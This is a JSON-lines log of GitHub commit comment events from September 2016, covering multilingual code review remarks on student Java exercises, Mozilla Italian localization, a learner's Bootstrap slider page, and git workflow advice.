{"id":"4631239696","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19208747,"position":7,"line":7,"path":"src/modulo-01-java-OO/modulo-01/Anao.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-28T14:58:32Z","updated_at":"2016-09-28T14:58:32Z","body":"Cliente não pediu para que um `Dwarf` tenha nome. Cuidado, faça apenas o necessário!"}},"created_at":"2016-09-28T14:58:32Z"}
{"id":"4631245608","type":"CommitCommentEvent","actor":{"login":"dinoboff"},"repo":{"name":"singpath/classmentors"},"payload":{"comment":{"id":19208759,"position":null,"line":null,"path":null,"commit_id":"1649029ae3952f04c325f6b884198292be2d20d0","created_at":"2016-09-28T14:59:20Z","updated_at":"2016-09-28T14:59:20Z","body":"@SingaporeClouds\r\n\r\nAt the time I set up the rules (a client update would not overwrite the worker lastUpdate timestamp), I assumed it was run as admin. \r\n\r\nIn which case do you want the worker to remove the details (and leave other data)?"}},"created_at":"2016-09-28T14:59:20Z"}
{"id":"4631249476","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19208768,"position":15,"line":15,"path":"src/modulo-01-java-OO/modulo-01/Anao.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-28T14:59:54Z","updated_at":"2016-09-28T14:59:54Z","body":"Se permitirmos que a quantidade de vida seja alterada a qualquer momento estaremos tirando do `Dwarf` o controle da vida dele. O cliente foi bem claro: `dwarves` devem perder 10 a cada flechada. Note que é fixo, não podemos permitir que seja alterado a qualquer momento."}},"created_at":"2016-09-28T14:59:54Z"}
{"id":"4631251199","type":"CommitCommentEvent","actor":{"login":"RodrigoScheuer"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19208771,"position":22,"line":39,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"43b14b6d069ecc777e94867ce2e610e14e4f44d7","created_at":"2016-09-28T15:00:10Z","updated_at":"2016-09-28T15:00:10Z","body":"poderia tambem colocar o Dwarve como atributo, mais nao achei certo."}},"created_at":"2016-09-28T15:00:10Z"}
{"id":"4631251309","type":"CommitCommentEvent","actor":{"login":"ofrogon"},"repo":{"name":"WoltersKluwerCanada/proget-universal-bower-client"},"payload":{"comment":{"id":19208773,"position":null,"line":null,"path":null,"commit_id":"ab3a81f8e9a3af5aacc3d6163faa43108aa1ff38","created_at":"2016-09-28T15:00:11Z","updated_at":"2016-09-28T15:00:11Z","body":"This will be brought back in v0.2.0 because this is a breaking change.\r\n\r\nPlease next time you do that kind of change communicate with me first, then I will know why you do something and we will be able to do it **clean**."}},"created_at":"2016-09-28T15:00:11Z"}
{"id":"4631251490","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19208774,"position":12,"line":12,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-28T15:00:13Z","updated_at":"2016-09-28T15:00:13Z","body":"Procure simplificar mais esta lógica."}},"created_at":"2016-09-28T15:00:13Z"}
{"id":"4631252798","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19208775,"position":16,"line":16,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"814702799f67876bfec48ff9b94c459e6e676359","created_at":"2016-09-28T15:00:22Z","updated_at":"2016-09-28T15:00:22Z","body":"Faça mais testes."}},"created_at":"2016-09-28T15:00:22Z"}
{"id":"4631256117","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19208787,"position":null,"line":null,"path":null,"commit_id":"98e1d935635ea544a9b95c4977c625270afd59c8","created_at":"2016-09-28T15:00:50Z","updated_at":"2016-09-28T15:00:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#e3HW_z8nTUuSsL76Xa1m_g"}},"created_at":"2016-09-28T15:00:50Z"}
{"id":"4631256219","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208788,"position":5,"line":6,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:00:51Z","updated_at":"2016-09-28T15:00:51Z","body":"Senza \"Un\""}},"created_at":"2016-09-28T15:00:51Z"}
{"id":"4631256346","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"BIRDRED/EDL"},"payload":{"comment":{"id":19208789,"position":null,"line":null,"path":null,"commit_id":"a85ad0dd9e1994e11905108d1aacc154fff827c4","created_at":"2016-09-28T15:00:52Z","updated_at":"2016-09-28T15:00:52Z","body":"Faltou subir as imagens."}},"created_at":"2016-09-28T15:00:52Z"}
{"id":"4631256650","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19208790,"position":null,"line":null,"path":null,"commit_id":"3f9c1412f5d7713b23a7c0203a688cda6dcaeef3","created_at":"2016-09-28T15:00:54Z","updated_at":"2016-09-28T15:00:54Z","body":"Thank you guys, seems that GL is indeed needed! LLR makes zigzag, was -1 then almost +2 and now dropped again below 0."}},"created_at":"2016-09-28T15:00:54Z"}
{"id":"4631259599","type":"CommitCommentEvent","actor":{"login":"opichals"},"repo":{"name":"gotwarlost/istanbul"},"payload":{"comment":{"id":19208796,"position":362,"line":743,"path":"lib/instrumenter.js","commit_id":"bc59131055abb04981ce5c2b934785bae7d81c1f","created_at":"2016-09-28T15:01:20Z","updated_at":"2016-09-28T15:01:20Z","body":"Just wondering, isn't this supposed to be:\r\n```\r\nend: { line: node.body.loc.end.line, column: node.body.loc.end.column }\r\n```\r\n"}},"created_at":"2016-09-28T15:01:20Z"}
{"id":"4631260190","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208798,"position":11,"line":11,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:01:25Z","updated_at":"2016-09-28T15:01:25Z","body":"Lo sapevi che Mozilla, la …\r\nDoppio spazio dopo mondiale,"}},"created_at":"2016-09-28T15:01:25Z"}
{"id":"4631260342","type":"CommitCommentEvent","actor":{"login":"moeller0"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":19208799,"position":null,"line":null,"path":null,"commit_id":"669e5b8bf3a4593261898dcd035359fd29105bbd","created_at":"2016-09-28T15:01:27Z","updated_at":"2016-09-28T15:01:27Z","body":"Hi Jonathan,\n\n\n> On Sep 28, 2016, at 16:03 , chromi <notifications@github.com> wrote:\n> \n> \n> > On 28 Sep, 2016, at 12:04, moeller0 <notifications@github.com> wrote:\n> > \n> > \"The PTM-TC then performs 64/65-octet encapsulation on the frame”\n> \n> If true, that does further simplify the calculation.\n\n\tWell, I cited out of the standard document specifying the use of PTM for XDSL (Rec. ITU-T G.992.3 (04/2009) page 355-364). While certainly not definitiv proof of “truth” what information made you think about bits? \nPlease note (even though I assume you know this) that PTM does not require potentially padded integer number of “cells” per payload frame, but will simply run the bearer “channel” with no data and every 65th byte will still be an synchronisation octet with value F0 (in base 16).\n\nBest Regards\n\tSebastian\n\n> \n> - Jonathan Morton\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-28T15:01:27Z"}
{"id":"4631261404","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208808,"position":17,"line":16,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:01:35Z","updated_at":"2016-09-28T15:01:35Z","body":"Anche qui toglierei Un"}},"created_at":"2016-09-28T15:01:35Z"}
{"id":"4631262690","type":"CommitCommentEvent","actor":{"login":"tomekr"},"repo":{"name":"dmayer/idb"},"payload":{"comment":{"id":19208811,"position":106,"line":null,"path":"lib/lib/device.rb","commit_id":"6f46da7bc903a86b804287c96f88d622f9b7b628","created_at":"2016-09-28T15:01:46Z","updated_at":"2016-09-28T15:01:46Z","body":"Removed in https://github.com/dmayer/idb/pull/76/commits/a5522899c85f902d49cfc617ca3365be8dacd916"}},"created_at":"2016-09-28T15:01:46Z"}
{"id":"4631263385","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208817,"position":6,"line":74,"path":"cmd/sponged/routes/routes.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T15:01:52Z","updated_at":"2016-09-28T15:01:52Z","body":"I would recommend `PUT` for now.  It's consistent with everything else we have build and is consistent with those semantics, because in general we are thinking upsert, which very well could be an update.  At least for now I think that keeps us consistent internally and externally."}},"created_at":"2016-09-28T15:01:52Z"}
{"id":"4631263450","type":"CommitCommentEvent","actor":{"login":"tomekr"},"repo":{"name":"dmayer/idb"},"payload":{"comment":{"id":19208818,"position":123,"line":null,"path":"lib/lib/device.rb","commit_id":"6f46da7bc903a86b804287c96f88d622f9b7b628","created_at":"2016-09-28T15:01:52Z","updated_at":"2016-09-28T15:01:52Z","body":"Removed in https://github.com/dmayer/idb/pull/76/commits/a5522899c85f902d49cfc617ca3365be8dacd916"}},"created_at":"2016-09-28T15:01:52Z"}
{"id":"4631269893","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19208837,"position":null,"line":null,"path":null,"commit_id":"ced8f0f967c1550e1ca809bda9e177944fecc814","created_at":"2016-09-28T15:02:48Z","updated_at":"2016-09-28T15:02:48Z","body":"Nice find. You should re-run autogen to make sure this works, as well as make sure we didn't leave behind anything."}},"created_at":"2016-09-28T15:02:48Z"}
{"id":"4631270277","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"BIRDRED/EDL"},"payload":{"comment":{"id":19208841,"position":null,"line":null,"path":null,"commit_id":"862501c4ccc7da3ac85db7388d47d713fd6b5952","created_at":"2016-09-28T15:02:52Z","updated_at":"2016-09-28T15:02:52Z","body":"Corrigir os 2 exemplos e incluir os outros 4..."}},"created_at":"2016-09-28T15:02:52Z"}
{"id":"4631270999","type":"CommitCommentEvent","actor":{"login":"jaywunder"},"repo":{"name":"jaywunder/crew-tv-dash"},"payload":{"comment":{"id":19208843,"position":null,"line":null,"path":null,"commit_id":"4e0766a4b6d9cbb8955a9def08619566d64a10ac","created_at":"2016-09-28T15:02:59Z","updated_at":"2016-09-28T15:02:59Z","body":"Please do not *ever* push to master.  The proper github flow that we and git in general uses is:\r\n 1. Branch off from master into a feature branch.  In this case you'd make a branch called `\"cs-challenge\"`.  \r\n 2. Make all code changes on the feature branch\r\n 3. Make a pull **request** to master.\r\n 4. I look over your code to see if it works or if it will break the master branch.\r\n 5. If I reject your pull request, then start back at step  number two\r\n\r\nThe goal of this flow is to have a master branch that always works and has no bugs.\r\n\r\nBecause you did not use this flow your code doesn't actually work and it doesn't comply with the code style of the rest of the project. \r\n\r\nWe can either meet and talk about the system I made, or I can make some documentation writing out how the page system works.  Which do you prefer?  Will you be at the CS Crew meeting tonight?"}},"created_at":"2016-09-28T15:02:59Z"}
{"id":"4631271544","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19208847,"position":null,"line":null,"path":null,"commit_id":"3a2283f7d92fc8064622d37a32e11a084f2a43b8","created_at":"2016-09-28T15:03:04Z","updated_at":"2016-09-28T15:03:04Z","body":"@Keital welcome bro :octocat: "}},"created_at":"2016-09-28T15:03:04Z"}
{"id":"4631275212","type":"CommitCommentEvent","actor":{"login":"jaywunder"},"repo":{"name":"jaywunder/crew-tv-dash"},"payload":{"comment":{"id":19208854,"position":null,"line":null,"path":null,"commit_id":"4e0766a4b6d9cbb8955a9def08619566d64a10ac","created_at":"2016-09-28T15:03:37Z","updated_at":"2016-09-28T15:03:37Z","body":"Your commit doesn't break master right now, but please fix it in  a feature branch.  If you had broken master I would have had to revert your commit.\r\n\r\nThank you!"}},"created_at":"2016-09-28T15:03:37Z"}
{"id":"4631277537","type":"CommitCommentEvent","actor":{"login":"flatlevel"},"repo":{"name":"Dronesmith-tech/Firmware"},"payload":{"comment":{"id":19208868,"position":null,"line":null,"path":null,"commit_id":"6799c6bd64c368ee76931e2db6711d39dc1dda7f","created_at":"2016-09-28T15:03:57Z","updated_at":"2016-09-28T15:03:57Z","body":":+1: "}},"created_at":"2016-09-28T15:03:57Z"}
{"id":"4631278445","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"gustavoboiuna/EDL"},"payload":{"comment":{"id":19208872,"position":null,"line":null,"path":null,"commit_id":"948c8d4a0af1c30425b2763495f25152ff0b782d","created_at":"2016-09-28T15:04:05Z","updated_at":"2016-09-28T15:04:05Z","body":"Adicionar mais 4 exemplos..."}},"created_at":"2016-09-28T15:04:05Z"}
{"id":"4631278738","type":"CommitCommentEvent","actor":{"login":"campos-ddc"},"repo":{"name":"Unity-Technologies/katana"},"payload":{"comment":{"id":19208873,"position":4,"line":204,"path":"master/setup.py","commit_id":"88eb9acdde0c032cb42da51a1c9a8c7a7500637e","created_at":"2016-09-28T15:04:08Z","updated_at":"2016-09-28T15:04:08Z","body":"This should probably be optional"}},"created_at":"2016-09-28T15:04:08Z"}
{"id":"4631281644","type":"CommitCommentEvent","actor":{"login":"vbashkirtsev"},"repo":{"name":"gengo/gengo-php"},"payload":{"comment":{"id":19208878,"position":6,"line":6,"path":"src/API.php","commit_id":"3473e54c070999fab48aa92b1bd3345e86ed8ee9","created_at":"2016-09-28T15:04:33Z","updated_at":"2016-09-28T15:04:33Z","body":"Dropping @package causes phpdocumentor not to insert API docs into packages section."}},"created_at":"2016-09-28T15:04:33Z"}
{"id":"4631282323","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208880,"position":22,"line":20,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:04:39Z","updated_at":"2016-09-28T15:04:39Z","body":"Partire direttamente con \"Siamo\". Il senso della frase è totalmente cambiato però spostando quel \"senza fini di lucro\".\r\n\r\n```\r\nSiamo Mozilla, un'organizzazione orgogliosamente senza fini di lucro schierata in difesa di Internet, per mantenerlo sano, vitale e accessibile a tutti`"}},"created_at":"2016-09-28T15:04:39Z"}
{"id":"4631283167","type":"CommitCommentEvent","actor":{"login":"xzyfer"},"repo":{"name":"davidkpiano/sassdash"},"payload":{"comment":{"id":19208883,"position":null,"line":null,"path":null,"commit_id":"1ecc1f3735784d536e37d2d47f1365042fac9881","created_at":"2016-09-28T15:04:46Z","updated_at":"2016-09-28T15:04:46Z","body":"Looks like you may have forgotten to commit `test/api/_property-of.scss."}},"created_at":"2016-09-28T15:04:46Z"}
{"id":"4631283424","type":"CommitCommentEvent","actor":{"login":"raj454raj"},"repo":{"name":"stopstalk/stopstalk-deployment"},"payload":{"comment":{"id":19208884,"position":13,"line":758,"path":"controllers/user.py","commit_id":"27a38d1cd7b491e09b7e2627f249764048cb70d5","created_at":"2016-09-28T15:04:49Z","updated_at":"2016-09-28T15:04:49Z","body":"oops"}},"created_at":"2016-09-28T15:04:49Z"}
{"id":"4631285552","type":"CommitCommentEvent","actor":{"login":"campos-ddc"},"repo":{"name":"Unity-Technologies/katana"},"payload":{"comment":{"id":19208894,"position":8,"line":21,"path":"master/buildbot/status/status_push.py","commit_id":"88eb9acdde0c032cb42da51a1c9a8c7a7500637e","created_at":"2016-09-28T15:05:08Z","updated_at":"2016-09-28T15:05:08Z","body":"If we do make kafka optional, this import will also have to be moved"}},"created_at":"2016-09-28T15:05:08Z"}
{"id":"4631290170","type":"CommitCommentEvent","actor":{"login":"DeerTrodis"},"repo":{"name":"DeerTrodis/helloworld"},"payload":{"comment":{"id":19208903,"position":2,"line":2,"path":"README.md","commit_id":"2b2571e2b0cca818ab98f169bd5cb0122825c6ed","created_at":"2016-09-28T15:05:47Z","updated_at":"2016-09-28T15:05:47Z","body":"ok"}},"created_at":"2016-09-28T15:05:47Z"}
{"id":"4631291762","type":"CommitCommentEvent","actor":{"login":"DeerTrodis"},"repo":{"name":"DeerTrodis/helloworld"},"payload":{"comment":{"id":19208906,"position":2,"line":2,"path":"README.md","commit_id":"2b2571e2b0cca818ab98f169bd5cb0122825c6ed","created_at":"2016-09-28T15:06:02Z","updated_at":"2016-09-28T15:06:02Z","body":"okok"}},"created_at":"2016-09-28T15:06:02Z"}
{"id":"4631295091","type":"CommitCommentEvent","actor":{"login":"mtholder"},"repo":{"name":"OpenTreeOfLife/peyotl"},"payload":{"comment":{"id":19208914,"position":null,"line":null,"path":null,"commit_id":"d09e28e9f9194664d81840d92d91097c34e817e1","created_at":"2016-09-28T15:06:30Z","updated_at":"2016-09-28T15:06:30Z","body":"seems fine to me. thanks!\r\n"}},"created_at":"2016-09-28T15:06:30Z"}
{"id":"4631299636","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208927,"position":47,"line":40,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:07:10Z","updated_at":"2016-09-28T15:07:10Z","body":"E se lo lasciassimo direttamente in inglese, compreso toolkit?"}},"created_at":"2016-09-28T15:07:10Z"}
{"id":"4631300919","type":"CommitCommentEvent","actor":{"login":"YaroslavW"},"repo":{"name":"YaroslavW/hello-word"},"payload":{"comment":{"id":19208932,"position":null,"line":null,"path":null,"commit_id":"208efb81df35285d6f7c5249140987c2a9d53da6","created_at":"2016-09-28T15:07:21Z","updated_at":"2016-09-28T15:07:21Z","body":"<!DOCTYPE html>\r\n<html lang=\"ru\">\r\n  <head>\r\n    <meta charset=\"utf-8\">\r\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->\r\n    <title>Bootstrap Template</title>\r\n\r\n    <!-- Bootstrap -->\r\n    <link href=\"css/bootstrap.css\" rel=\"stylesheet\">\r\n<link href=\"style.css\" rel=\"stylesheet\">\r\n    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->\r\n    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->\r\n    <!--[if lt IE 9]>\r\n      <script src=\"https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js\"></script>\r\n      <script src=\"https://oss.maxcdn.com/respond/1.4.2/respond.min.js\"></script>\r\n    <![endif]-->\r\n  </head>\r\n  <body>\r\n   <div class=\"navbar navbar-inverse navbar-static-top\">\r\n  <div class=\"container\">\r\n  <div class=\"navbar-header\">\r\n   <button type=\"button\" data-target=\"#responsive-menu\" data-toggle=\"collapse\" class=\"navbar-toggle\">\r\n  <!--<button type=\"button\" class=\"navbar-toggle\" data-toggle=\"collapse\" data-target=\"#responsive-menu\">-->\r\n  <span class=\"sr-only\">Открыть навигацию</span>\r\n  <span class=\"icon-bar\"></span>\r\n  <span class=\"icon-bar\"></span>\r\n  <span class=\"icon-bar\"></span>\r\n  </button><!--Кнопка которая открывает навигацию --->\r\n  <a class=\"navbar-brand\" href=\"#\">Логотип</a> <!--название есть в \"Название сайта\"-->\r\n  </div>\r\n  <div class=\"collapse navbar-collapse\" id=\"responsive-menu\"><!--сама навигация-->\r\n  <ul class=\"nav navbar-nav\">\r\n  <li><a href=\"#\">Пункт 1</a></li>\r\n  <li class=\"dropdown\"><a href=\"#\" class=\"dropdown-toggle\" data-toggle=\"dropdown\">Пункт 2<b class=\"caret\"></b></a>\r\n  <ul class=\"dropdown-menu\">\r\n  <li><a href=\"#\">Часть1</a></li>\r\n  <li><a href=\"#\">Часть2</a></li>\r\n  <li><a href=\"#\">Чать3</a></li>\r\n  <li class=\"divider\"></li><!--Визуально отделяет чертой! -->\r\n  <li><a href=\"#\">Часть4</a></li>\r\n  </ul>\r\n  </li>\r\n  <li><a href=\"#\">Пункт 3</a></li>\r\n  <li><a href=\"#\">Пункт 4</a></li>\r\n  </ul>\r\n  </div>\r\n  </div>\r\n  </div>\r\n  <!--Здесь ниже будет слайдер-->\r\n  <div class=\"carousel slide\" id=\"carousel\"><!--Индикаторы слайдов-->\r\n  <ol class=\"carousel-indicators\">\r\n  <li class=\"active\" data-target=\"#carousel\" data-slide=\"0\"></li>\r\n  <li data-target=\"#carousel\" data-slide=\"1\"></li>\r\n  <li data-target=\"#carousel\" data-slide=\"2\"></li>\r\n  </ol>\r\n  <div class=\"carousel-inner\"><!--Блок который содержит в себе все слайды-->\r\n  <div class=\"item active\">\r\n  <img src=\"http://perchinka63.ru/attachments/Image/rozovyj-cvetok-makro-kameliya.jpg?template=generic\" alt=\"image0\"><!--Картинка-->\r\n  <div class=\"carousel-caption\"><!--Описание слайда-->\r\n  <h1>Первый слайд</h1>\r\n  <p>Описание первого слайда</p>\r\n  </div>\r\n  </div>\r\n  <div class=\"item\">\r\n   <img src=\"http://perchinka63.ru/attachments/Image/rozovyj-cvetok-makro-kameliya.jpg?template=generic\" alt=\"image0\"><!--Картинка-->\r\n  <div class=\"carousel-caption\"><!--Описание слайда-->\r\n  <h1>Второй слайд</h1>\r\n  <p>Описание второй слайда</p>\r\n  </div>\r\n  </div>\r\n  <div class=\"item\">\r\n   <img src=\"http://perchinka63.ru/attachments/Image/rozovyj-cvetok-makro-kameliya.jpg?template=generic\" alt=\"image0\"><!--Картинка-->\r\n  <div class=\"carousel-caption\"><!--Описание слайда-->\r\n  <h1>Третий слайд</h1>\r\n  <p>Описание третьего слайда</p>\r\n  </div>\r\n  </div>\r\n  </div>\r\n  <a href=\"#carousel\" class=\"left carousel-control\" data-slide=\"prev\"><!-- Кнопака влво и вправо-->\r\n  <span class=\"glyphicon glyphicon-chevron-left\"></span>\r\n  </a>\r\n  <a href=\"#carousel\" class=\"right carousel-control\" data-slide=\"next\">\r\n  <span class=\"glyphicon glyphicon-chevron-right\"></span>\r\n  </a>\r\n  </div>\r\n  <!--Выше слайдер ниже контент-->\r\n  <div class=\"container\">\r\n  <div class=\"row\">\r\n  <h1>Название страницы</h1>\r\n\r\n  </div>\r\n  </div>\r\n  \r\n  <div class=\"container-fluid\">\r\n  <div class=\"row\">\r\n   <div class=\"col-md-6\">\r\n   <div class=\"row\">\r\n   <div class=\"col-md-4\"></div>\r\n   <div class=\"col-md-4\"></div>\r\n   <div class=\"col-md-4\"></div>\r\n   </div>\r\n   </div>\r\n   <div class=\"col-md-4 hidden-md visible-lg\"></div>\r\n   <!--Отступы для разных размеров offset -<div class=\"col-md-4 col-md-offset-2 col-sm-offset-0 col-lg-offset-2\"></div>-->\r\n\t</div>\r\n</div>\r\n    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->\r\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js\"></script>\r\n    <!-- Include all compiled plugins (below), or include individual files as needed -->\r\n    <script src=\"js/bootstrap.js\"></script>\r\n  </body>\r\n</html>\r\n"}},"created_at":"2016-09-28T15:07:21Z"}
{"id":"4631302550","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19208935,"position":null,"line":null,"path":null,"commit_id":"a6962be0d4899a0dd0c44c00ff5f64f7504c249e","created_at":"2016-09-28T15:07:35Z","updated_at":"2016-09-28T15:07:35Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36247/testReport/) for this commit**"}},"created_at":"2016-09-28T15:07:35Z"}
{"id":"4631303386","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"PaivaHugo/EDL"},"payload":{"comment":{"id":19208936,"position":null,"line":null,"path":null,"commit_id":"b1f8709a29f1937d5deaf81a43c515d73c067fc8","created_at":"2016-09-28T15:07:43Z","updated_at":"2016-09-28T15:07:43Z","body":"Melhorar 4 dos 6 exemplos..."}},"created_at":"2016-09-28T15:07:43Z"}
{"id":"4631305358","type":"CommitCommentEvent","actor":{"login":"buithuynhung"},"repo":{"name":"Kotlin-Polytech/KotlinAsFirst2016"},"payload":{"comment":{"id":19208941,"position":null,"line":null,"path":null,"commit_id":"0c2d4e3dacd48844e9af297e3c0e338ef6a65fda","created_at":"2016-09-28T15:08:01Z","updated_at":"2016-09-28T15:08:01Z","body":"lesson 1, 2, 3"}},"created_at":"2016-09-28T15:08:01Z"}
{"id":"4631310302","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208951,"position":57,"line":48,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:08:44Z","updated_at":"2016-09-28T15:08:44Z","body":"piattaforma unica\r\ntutti noi"}},"created_at":"2016-09-28T15:08:44Z"}
{"id":"4631310574","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19208954,"position":37,"line":258,"path":"footparse/soccerway.py","commit_id":"eeec3acba80936074c2023a087f4a99ef939dfa4","created_at":"2016-09-28T15:08:46Z","updated_at":"2016-09-28T15:08:46Z","body":"Might be confusing with our conception of \"match\" ⚽ 😆 "}},"created_at":"2016-09-28T15:08:46Z"}
{"id":"4631311875","type":"CommitCommentEvent","actor":{"login":"peterdesmet"},"repo":{"name":"inbo/inbo-pyutils"},"payload":{"comment":{"id":19208958,"position":null,"line":null,"path":null,"commit_id":"0c4ae7b291868b32fe9936692b3d5f33a736bebf","created_at":"2016-09-28T15:08:58Z","updated_at":"2016-09-28T15:08:58Z","body":"Great!"}},"created_at":"2016-09-28T15:08:58Z"}
{"id":"4631315399","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208967,"position":77,"line":64,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:09:29Z","updated_at":"2016-09-28T15:09:29Z","body":"potenziale…possibilità lo eviterei\r\n\"scelte\" per il secondo?"}},"created_at":"2016-09-28T15:09:29Z"}
{"id":"4631318294","type":"CommitCommentEvent","actor":{"login":"YaroslavW"},"repo":{"name":"YaroslavW/hello-word"},"payload":{"comment":{"id":19208976,"position":61,"line":61,"path":"СЛАЙДЕР НА BOOTSTRAP","commit_id":"208efb81df35285d6f7c5249140987c2a9d53da6","created_at":"2016-09-28T15:09:55Z","updated_at":"2016-09-28T15:09:55Z","body":" <div class=\"carousel-caption\">"}},"created_at":"2016-09-28T15:09:55Z"}
{"id":"4631319744","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19208979,"position":60,"line":281,"path":"footparse/soccerway.py","commit_id":"eeec3acba80936074c2023a087f4a99ef939dfa4","created_at":"2016-09-28T15:10:08Z","updated_at":"2016-09-28T15:10:08Z","body":"Maybe `elem` is too general: is it possible in these cases to describe more precisely what it is ? Especially since the xPath is not always obvious..."}},"created_at":"2016-09-28T15:10:08Z"}
{"id":"4631320210","type":"CommitCommentEvent","actor":{"login":"jaywunder"},"repo":{"name":"jaywunder/crew-tv-dash"},"payload":{"comment":{"id":19208980,"position":null,"line":null,"path":null,"commit_id":"4e0766a4b6d9cbb8955a9def08619566d64a10ac","created_at":"2016-09-28T15:10:11Z","updated_at":"2016-09-28T15:10:11Z","body":"I have branched your commit into a branch called \"cs-daily-challenge\" for you and then reverted your commit on master. I've also changed master push permissions for everyone to require a pull request. "}},"created_at":"2016-09-28T15:10:11Z"}
{"id":"4631321350","type":"CommitCommentEvent","actor":{"login":"Fingercomp"},"repo":{"name":"hel-repo/hel-face"},"payload":{"comment":{"id":19208985,"position":null,"line":null,"path":null,"commit_id":"620ebc74f599f5bb4cf53be29a2ff8746225581a","created_at":"2016-09-28T15:10:21Z","updated_at":"2016-09-28T15:10:21Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Сделать простейший список пакетов](https://trello.com/c/gdgpHwNl/10--)"}},"created_at":"2016-09-28T15:10:21Z"}
{"id":"4631323333","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19208993,"position":32,"line":28,"path":"it/mozorg/home/index-2016.lang","commit_id":"f46e80f5d0c174d812ca72e846d1ffa90ee5d39c","created_at":"2016-09-28T15:10:38Z","updated_at":"2016-09-28T15:10:38Z","body":"Credo che che il senso sia un po' troppo distante dall'originale.\r\n\"Lavorando insieme ad attivisti e legislatori\" (la seconda è un po' tirata)."}},"created_at":"2016-09-28T15:10:38Z"}
